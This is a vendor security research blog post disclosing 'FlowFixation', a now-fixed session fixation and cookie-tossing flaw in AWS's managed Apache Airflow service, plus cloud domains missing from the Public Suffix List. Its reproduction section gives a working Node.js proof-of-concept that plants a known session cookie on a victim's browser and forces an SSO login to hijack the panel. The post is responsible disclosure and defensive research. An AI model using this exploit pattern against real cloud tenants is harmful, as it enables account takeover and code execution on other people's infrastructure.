FlowFixation: AWS Apache Airflow Service Takeover Vulnerability and Why Neglecting Guardrails Puts Major CSPs at Risk
Tenable Research discovered a one-click account takeover vulnerability in the AWS Managed Workflows Apache Airflow service that could have allowed full takeover of a victim’s web management panel of the Airflow instance. The discovery of this now-resolved vulnerability reveals a broader problem of misconfigured shared-parent domains that puts customers of major CSPs at risk.
TL;DR
- Tenable Research discovered a vulnerability we have dubbed FlowFixation that could have allowed a malicious actor to hijack a victim’s session in AWS Managed Workflows for Apache Airflow (MWAA), and that could have resulted in remote code execution (RCE) on the underlying instance, and in lateral movement to other services.
- Additional research revealed that numerous shared-parent service domains in AWS, Azure and GCP were misconfigured, putting cloud customers at considerable risk.
- Some significant risks due to the misconfiguration included cookie tossing, which can lead to session fixation abuse and cross-site request forgery (CSRF) protection bypass; and same-site cookie protection bypass.
- Adding the misconfigured domains to the Public Suffix List (PSL) would have prevented exploitation of FlowFixation and other vulnerabilities including high severity vulnerabilities that others have documented and disclosed.
- A combination of responsible security practices by both cloud providers and cloud customers can minimize many risks associated with shared-parent service domains:
- While the PSL is an effective guardrail, it’s up to cloud providers to act on this preventive approach.
- Cloud customers can use a web application scanner such as Tenable’s to protect themselves from some of the aforementioned risks
The FlowFixation vulnerability
The FlowFixation account-takeover vulnerability, now fixed by Amazon Web Services (AWS), results from a combination of session fixation on the web management panel of the AWS MWAA (Managed Workflows for Apache Airflow) together with an Amazon AWS domain misconfiguration that leads to cookie tossing. By abusing the vulnerability, an attacker could have forced victims to use and authenticate the attacker’s known session. This manipulation could have enabled the attacker to later use the same, now-authenticated session to take over the victim’s web management panel.
FlowFixation highlights a broader issue with the current state of cloud providers’ domain architecture and management as it relates to the Public Suffix List (PSL) and shared-parent domains: same-site attacks. FlowFixation could have been prevented if certain available countermeasures — an important guardrail — had been implemented by AWS.
This blog describes the same-site attack risks inherent in leading cloud environments; the FlowFixation vulnerability case study; and a guardrail that cloud providers can put in place to help prevent such risks.
FlowFixation and same-site attacks in the cloud: Impact
In the case of FlowFixation, upon taking over the victim’s account, the attacker could have performed tasks such as reading connection strings, adding configurations and triggering directed acyclic graphs (DAGS.) Under certain circumstances such actions can result in RCE on the instance that underlies the MWAA, and in lateral movement to other services.
In the case of same-site attacks, the security impact of the mentioned domain architecture is significant, with heightened risk of such attacks in cloud environments. Among these, cookie-tossing attacks and same-site attribute cookie protection bypass are particularly concerning as both can circumvent CSRF protection. Cookie-tossing attacks can also abuse session-fixation issues.
Same-site attacks and a neglected guardrail
Exposing a much broader problem in which major CSPs are at risk
Background
Many services in cloud environments share the same parent domain. For example, in AWS, Amazon Simple Storage Service (S3), Amazon API Gateway and other services share the “amazonaws.com” domain. This sharing leads to a scenario in which non-related customers host their assets on subdomains of the “amazonaws.com” shared parent domain. The problem is that some assets may also allow client-side code execution as a service.
If we compare it to an on-prem environment, this scenario is like an XSS on a subdomain of a website you do not own. In an on-prem setting you would not normally allow users to run XSS on your subdomain, but in the cloud, allowing this is quite natural. For example, when creating an AWS S3 bucket, you can run client-side code by storing an HTML page in your bucket. The code will run in the context of the S3 bucket subdomain you were granted and also in the context of the shared parent domain, “amazonaws.com.”
I found this risky attack class exists by default in the domain architecture of the three major cloud service providers (CSPs): AWS, Microsoft Azure and Google Cloud Platform (GCP). Let’s look at how and why, and the consequences inherent in this architecture when available countermeasures are absent.
What's the difference between a site and an origin?
Before we explore this new attack class, it is important to first understand the difference between a site and an origin. Here’s an example, using fictitious tenable.com URLs:
https://tenable.com:443
- A site takes into account only the parent domain (TLD + 1) and scheme
- An origin takes into account the parent domain, scheme, subdomains and the port
Let’s see how this architectural reality can affect cloud services. Amazon API Gateway is a fully managed service that makes it easy for developers to create and secure APIs at any scale. So, for example, my API gateway on https://livs-tenable-gateway.execute-api.eu-central-1.amazonaws.com shares the same site as any other AWS customer whose API gateways are deployed using Amazon API Gateway. Continuing the example, another customer’s website may have the url: https://victims-gateway.execute-api.us-east1.amazonaws.com
Given that a site considers only the scheme and the parent domain, in the website URLs of the examples above, the scheme (https) and the parent domain (amazonaws.com) are the same. Therefore, both my website and my victim's website share the same site — as noted, very normal in the cloud, very not normal according to on-prem standards.
The problem
The described domain architecture poses the risk of a unique attack class of same-site attacks in the cloud. If the cloud provider has not implemented the necessary guardrail, customers sharing the same site in a cloud service are prone to these kinds of risks or attacks:
- Cookie tossing attacks (supercookie) — CSRF protection bypass, session fixation abuse
- Cookie bombing
- Same-site cookie protection bypass
And besides the suggested PSL guardrail, same-site can introduce more risks such as:
- XS-Leaks
- CORS misconfigurations
- Domain relaxation
- Content-Security-Policy bypass
- postMessage abuse
- Same-site browser CVEs
- Cache partitioning partitions by site
While all the above attacks and risks are possible under certain circumstances -- click on the links to better understand each risk and its complexity – cookie tossing is by far the most prevalent. The FlowFixation case study is one example of cookie tossing; two other high-severity vulnerability examples of cookie tossing published by other security researchers are:
- AWS SageMaker - Jupyter Notebook Instance Takeover by Gafnit Amiga
- Cookie Tossing to RCE on Google Cloud JupyterLab by s1r1us
Both cases utilize cookie tossing from the attacker’s subdomain to the victim’s subdomain on the same site to bypass the CSRF protection on the server.
What’s striking is that none of these vulnerabilities could be exploited if the PSL guardrail were in place. The AWS SageMaker and GCP JupyterLab vulnerabilities could have been prevented by inputting the Jupyter Notebooks’ domains in the PSL. The FlowFixation vulnerability could have been prevented by implementing the PSL guardrail presented further below.
Preventing exploitation — the public suffix guardrail
Let’s look at how by correctly managing and understanding the public suffix prevent this vulnerability’s exploitation.
Understanding the public suffix in internet domains
In the vast expanse of the internet, have you ever come across the term "public suffix" or “eTLD”? A public suffix, also known as an eTLD, is essentially a domain under which individuals can, or once could, register names directly. Think of familiar domain endings like .com, .co.uk or the more unique pvt.k12.ma.us — these are all examples of public suffixes.
Enter the PSL, a comprehensive list that contains all known public suffixes. Mozilla initiated the PSL in the 2000s and it is still thriving, now as a community-powered resource. The inception of the PSL was primarily to cater to the unique requirements of browser developers; today, its utility is recognized in some software environments. By adding the domains of services that share a site and involve different customers, browsers recognize the domain added as a public suffix. As a result, the associated cloud providers’ services will not be vulnerable to the aforementioned risks.
Research into the current state of PSL among cloud providers
In the cloud, with many cloud services, and different customers sharing a site or parent domain, managing public suffix domains is an important defense-in-depth control. Cloud providers need to ensure that domains are categorized correctly and do not pose risks like those mentioned. It turns out that the efficacy of domain management differs from one cloud provider to the next.
To get a sense of the scope of the problem, I mapped, as best I could, the misconfigured domains of major cloud provider services not specified in the PSL. I focused on services at higher risk of same-site attacks because they use a site that many customers share. It is quite likely that, beyond those I mapped, there are potentially many more misconfigured domains not in the PSL.
AWS
The main cause of the FlowFixation vulnerability was the session fixation which, as noted, AWS has since fixed. Exploiting the vulnerability was made possible also by the absence of a second layer of defense: the guardrail of the MWAA and API Gateway domains being entered in the PSL by AWS. Since both layers of defense were missing I was able to abuse these domains and their absence from the PSL by tossing my known session cookie to the shared site of “amazonaws.com.”
To quote Wikipedia on supercookies: “A supercookie is a cookie with an origin of a top-level domain (such as .com) or a public suffix (such as .co.uk). Ordinary cookies, by contrast, have an origin of a specific domain name, such as example.com. Supercookies can be a potential security concern and are therefore often blocked by web browsers.”
I found these AWS domains to be misconfigured because they were not present in the PSL:
- sagemaker.aws - Amazon Sagemaker
- amplifyapp.com - AWS Amplify
- airflow.amazonaws.com - Amazon Managed Workflows for Apache Airflow
- execute-api.$region.amazonaws.com - Amazon API Gateway
Due to the nature of AWS domain architecture, it is admittedly hard for AWS to keep up with and add newly created regions to the PSL. For example, the new Israeli region (il-central-1) was initially not in the PSL and therefore was also misconfigured.
Report response
We commend AWS for its collaboration and efforts in addressing the problem. Upon being informed of FlowFixation, the AWS shared parent service domains found to be at risk and our PSL guardrail recommendation, AWS conducted a thorough review of its own and decided to input an even wider range of missing domains to the PSL. In the first fix phase, AWS updated these domains in or added them to the PSL – and intends to add more in the future:
- Amazon API Gateway
- Amazon Cognito
- Amazon EMR
- Amazon Managed Workflows for Apache Airflow
- Amazon S3
- Amazon SageMaker Notebook Instances
- Amazon SageMaker Studio
- Analytics on AWS
- AWS Amplify
- AWS App Runner
- AWS Elastic Beanstalk
A link for the PSL Github pull request by AWS can be found here.
Azure
I found these Azure domains to be misconfigured because they were not present in the PSL:
- azure-api.net - Azure API Management
- azureedge.net - Azure Edge
- azurefd.net - Azure Front Door
- blob.core.windows.net - Azure Blob Storage
- cloudapp.azure.com - Azure Cloud Services and Azure Virtual Machines
- cloudapp.net - Azure Cloud Services and Azure Virtual Machines
- servicebus.windows.net - Azure Service Bus
- trafficmanager.net - Azure Traffic Manager
Report Response
We commend Microsoft Azure for its collaboration and efforts in addressing the problem. Upon being informed of the Azure shared parent service domains found to be at risk and our PSL guardrail recommendation, Azure decided to input to the PSL all the missing domains we had reported to them.
A link for the PSL Github pull request by Azure can be found here.
GCP
I found that “googleusercontent.com” is not in the public suffix:
- This domain is the default parent domain of each website hosted on the Google Compute Engine (Virtual Machines)
- The Google Cloud Composer service that hosts Apache Airflow also hosts Apache Airflow on “googleusercontent.com”
- Jupyterlab is also hosted in this domain
Report response
Upon being informed of the GCP shared parent service domains found to be at risk and our PSL guardrail recommendation, GCP opted not to fix the issue, saying in a message that it doesn’t consider the issue “severe enough” to track it as a security bug.
FlowFixation vulnerability
Let’s now do a deep dive into the details of the vulnerability. Before doing so, let’s clarify a few important terms.
What is Apache Airflow and what is AWS MWAA?
Apache Airflow is an open-source platform for programmatically authoring, scheduling and monitoring workflows. MWAA is a managed AWS service that simplifies the setup, deployment and scaling of such data workflows. It allows users to build, schedule and monitor their workflows in a managed Apache Airflow without managing the underlying infrastructure.
How common is Apache Airflow and related managed services?
Apache Airflow is one of the most popular orchestration tools, with 12 million downloads per month. A sampling from our research showed that managed services for Apache Airflow are in use by 20% of our customers.
High-level chain components
The FlowFixation attack chain starts with a fairly wide-open door in the form of non-refreshed session cookies.
Session management abuse
The AWS single sign-on (SSO) to Apache Airflow previously did not refresh the session cookie upon login/authentication, and a victim’s unverified session is retrievable without authentication.
Cookies can be set to a parent domain
Like many other AWS services, Apache Airflow is hosted under the parent domain of “.amazonaws.com”. The API Gateway can be hosted publicly to act as the attacker’s website hosted on the same shared parent domain of MWAA, “.amazonaws.com”, and run the malicious javascript.
Since neither domain is listed in the PSL, the attacker can carry out cookie tossing by simply setting the attacker’s known session cookie for the victim’s MWAA web management panel (a subdomain of amazonaws.com) to all shared parent domain subdomains in the victim's browser. This action causes the sharing of the set session cookie with the victim’s MWAA web management panel.
Reaping the rewards
An attacker can force a victim to authenticate to their (the victim’s) MWAA web management panel using the attacker’s known victim’s session and a known SSO redirection URL; the attacker then uses the session to hijack the victim’s Apache Airflow web panel.
Research story deep dive
Apache Airflow Authentication
Each MWAA instance is attached to a web panel for managing workflows, connections, DAGS and more:
The Airflow UI is a management web panel that requires AWS IAM authentication. We can inspect the session cookie of our web-panel named session with a random uuid value:
Notice the Path attribute of the cookie is set to “/” and the domain attribute is set to the specific domain of our web panel. How did we even get this cookie? By proxying the authentication HTTP requests, we can understand how authentication works for the MWAA web panel.
From the AWS web console, we send a security token service (STS)-signed request to the Airflow API with the name of our Airflow environment. In return, we get the JSON Web Token (JWT), named “WebToken”, for our MWAA web panel. The IAM permission that works and is required behind the scenes is airflow:CreateWebLoginToken.
We then get a session cookie through the /aws_mwaa/aws-console-sso?login=true endpoint. The session is retrievable unauthenticated because it is not yet populated. The session will simply not work for authentication without redeeming a JWT with it:
The next step is to redeem our retrieved JWT and session cookie to verify and populate the session as valid so that we are authenticated.
The session cookie can now be used to access the web panel and is verified with the JWT redeem.
Session handling misconfiguration
If we look closely, the last screenshot has a problem: the session cookie we got after redeeming our JWT and authenticating is the exact same session we got before authenticating.
To summarize, the authentication works by retrieving a JWT in return for the user’s STS; the JWT is then redeemed with a given session cookie for a verified session cookie to authenticate the user. With this in mind, I now know I can get a session cookie for the victim’s web panel that does not require authentication and that the session does not change after logging in.
Abuse idea - cookie tossing and PSL research
What if, by using a redirect from my malicious website, I force the victim to log in with their JWT through the MWAA SSO redirect URL to verify the known session I obtained from their web panel, and then use the verified session to take over the panel?
With the AWS console cookies in their browser, victims who visit the MWAA AWS console SSO-redirect URL will be redirected to their web panel and log in automatically with the flow I just demonstrated.
So the next order of business is to find a way to toss or inject cookies into the victim’s browser, under the domain of their Airflow web panel.
At first, finding such a way seemed straightforward since I know that, as long as I have control over a subdomain of the parent domain, I can set a cookie for the parent domain. Since, just like the Airflow web panel, S3 buckets are hosted on “amazonaws.com”. I tried to set a cookie from my S3 bucket to my Airflow web panel, which was behaving as the victim’s panel. Doing so was as simple as:
document.cookie="session=our-known-retrieved-uuid; Path=/; Domain=.amazonaws.com"
But I noticed the cookie wasn’t set. I quickly understood that the domain attribute was causing the cookie to not be set. I guessed it was a public suffix issue. As explained above, I researched the matter further and found the domains of S3 buckets are listed in the PSL. However, since the Airflow domain wasn’t in the public suffix, I only needed an AWS service that could be publicly exposed to be able to run code that would behave as the attacker’s website.
I used Google Dorking to find services under the shared parent domain I wanted to test, site:amazonaws.com, and found the API Gateway service to be misconfigured and not in the PSL, so it allowed the setting of cookies to the parent domain:
This service is a perfect setup for the vulnerability since it allows code execution as a service, and I can use it as my attacker website.
Browser cookie handling obstacle
When injecting my known session cookie I needed to ensure that, when the victim logs in, the browser would use my session rather than the session set by the server. For my set injected cookie to take precedence over other cookies with the same name already in the victim’s browser, I could set its path attribute to a deeper path, under “/aws_mwaa/login”. When browsers encounter two cookies with the same name, they use and prioritize the cookie with the deeper/more specific path!
Technical Exploit Flow
I summarize here the exploit’s entire flow chain for achieving the takeover:
Since any Apache Airflow instance is hosted under the “.amazonaws.com” domain, for example, https://aaaaaaaa5-aef2-443e-aaa-aaaaaaa.c3.eu-central-1.airflow.amazonaws.com, we can host other services in our control that share the same domain and allow us to run our code to facilitate the attack. One of those services is Amazon API Gateway REST API, which we can point to our external server, which holds the exploit code.
The exploit code runs on a victim’s page visit to our REST API, which is also hosted under “.amazonaws.com”, for example: https://a32tasaaeoj.execute-api.eu-central-1.amazonaws.com/
The code sends an unauthenticated valid request to the victim’s web panel and is accessing the /aws_mwaa/aws-console-sso?login=true endpoint that will grant the attacker the new session to the victim’s Apache Airflow web panel. Keep in mind that this session is not yet valid and will not allow the attacker to authenticate at this point.
The client-side code then sets the known obtained session cookie in the victim’s browser under “.amazonaws.com.” This cookie setting is allowed since the attacker’s website is hosted under the API Gateway domain, which shares the parent domain of “.amazonaws.com” with the MWAA service, and also because both subdomains of Airflow and API Gateway were not in the PSL.
For our set cookie to take precedence over other cookies with the same name that are already in the victim’s browser, the code sets the path attribute of the cookie to a deeper path under “/aws_mwaa/login”. As noted, when browsers encounter two cookies with the same name, they use and prioritize the cookie with the deeper/more specific path.
The next step is to redirect the victim to the following URL, to force the victim into logging in to their Apache Airflow web panel https://eu-central-1.console.aws.amazon.com/mwaa/home?region=eu-central-1#environments/ExampleAirflowName/sso. The victim is automatically redirected to the SSO flow and forced to log in with the session knowingly set by the attacker.
The attacker could then use the known session, which is now authenticated and valid, to take over the victim’s Managed Apache Airflow web portal.
Note: The redirection to the SSO login flow is not mandatory; the attacker could wait and use their injected session cookie at the victim's next login.
Reproduction
These are the steps attackers would have followed to reproduce the vulnerability.
- Run the following Node.js server with node server.js (change all occurrences of “victimsairflow” to the real target)
const http = require('http');
const https = require('https');
const server = http.createServer((req, res) => {
res.writeHead(200, { 'Content-Type': 'text/html' });
if (req.method === 'GET' && req.url === '/pocforaws') {
const options = {
hostname: 'victimsairflow.c3.eu-central-1.airflow.amazonaws.com',
path: '/aws_mwaa/aws-console-sso?login=true',
method: 'GET'
};
const externalReq = https.request(options, (externalRes) => {
let cookies = externalRes.headers['set-cookie'];
if (cookies) {
console.log('Received Cookies:', cookies);
}
const cookieValue = cookies[0].split(';')[0].split('=')[1];
console.log('Extracted Cookie Value:', cookieValue);
let responseData = '';
externalRes.on('data', (data) => {
responseData += data;
});
externalRes.on('end', () => {
console.log('External request completed');
const responseHTML = `
<html>
<body>
<p>${cookieValue}</p>
<script>
document.cookie = 'session=${cookieValue}; domain=.amazonaws.com; path=/aws_mwaa/login';
console.log('Cookie set:', document.cookie);
document.location = 'https://eu-central-1.console.aws.amazon.com/mwaa/home?region=eu-central-1#environments/victimsairflowenvironment/sso';
</script>
</body>
</html>
`;
res.end(responseHTML);
});
});
externalReq.on('error', (error) => {
console.error('Error in external request:', error);
res.end('<html><body><h1>Error in external request</h1></body></html>');
});
console.log('Sending External Request:', options);
externalReq.end();
} else {
res.end('<html></html>');
}
});
const PORT = 8080;
server.listen(PORT, () => {
console.log(`Server is running on port ${PORT}`);
});
- Create a new API Gateway REST API, change the response type to text/html and point to the external Nodejs server you hosted.
- Lure the victim into your REST API granted domain under “.amazonaws.com”.
- Use the now-authenticated session cookie you obtained and printed in your Node.js server.
How to identify and protect yourself from the associated risks
A web application scanner can help identify cloud technologies used in web applications and related vulnerabilities. A robust scanner covers some of the mentioned risks associated with shared parent service domains, such as: session fixation and CORS misconfigurations.
Specifically, the Tenable web application scanning solution, Tenable Web App Scanning, provides a comprehensive list of plugins designed to detect cloud services used by web applications and identify common issues, such as data exposure, CI/CD permission controls and SaaS application misconfigurations. The plugins include those with an API focus, which detect insecure API usage in web applications for both representational state transfer (REST) and GraphQL technologies.
The solution adds plugins on a regular basis to cover new cloud web application security risks as they emerge.
Conclusion
The discovery of the FlowFixation vulnerability in AWS’s managed service for Apache Airflow sheds light on critical security concerns within cloud environments. This vulnerability exposed a significant risk in that it allowed attackers to exploit session fixation and cross-site scripting to gain unauthorized access to a victim’s web management panel. By infiltrating the Managed Workflows for Apache Airflow (MWAA) web panel, attackers could have potentially compromised the entire instance, leading to unauthorized access to other services, secrets and configurations, and even the execution of malicious code.
Furthermore, the vulnerability highlights a broader issue with CSPs’ domain architecture with respect to shared parent domains and the PSL. The architecture of cloud services, such as AWS, Azure, and GCP, presents a scenario where multiple customers share the same parent domain. This shared architecture poses a considerable risk, enabling attackers to exploit vulnerabilities like same-site attacks, cross-origin issues and cookie tossing, which can lead to unauthorized access, data leaks and code execution.
The importance of the PSL cannot be understated in mitigating such risks. Proper domain management and inclusion in the PSL are crucial to preventing attackers from exploiting vulnerabilities. Unfortunately, the research reveals that some major cloud providers, such as AWS, Azure, and GCP, have misconfigured domains because they are not listed in the PSL, making their customers vulnerable to vulnerabilities like FlowFixation and other published high-severity vulnerabilities.
As organizations continue to rely on cloud services for their infrastructure and operations, it is imperative that cloud providers prioritize secure domain architecture and actively maintain the PSL. Addressing these misconfigurations and enhancing security measures will contribute to a safer and more resilient cloud environment for businesses and their customers. Cloud customers can also take preventive action and reduce their dependency on the CSP to implement the recommended PSL guardrail by using a web application scanner.
The FlowFixation vulnerability serves as a reminder that a proactive and preventive approach to security is essential in an evolving digital landscape in which the potential for threats is ever-present.
Tenable Cloud Security is here to help
Feel free to contact Tenable Research with any questions or concerns you have about cloud security.
- Cloud
- Research
- Cloud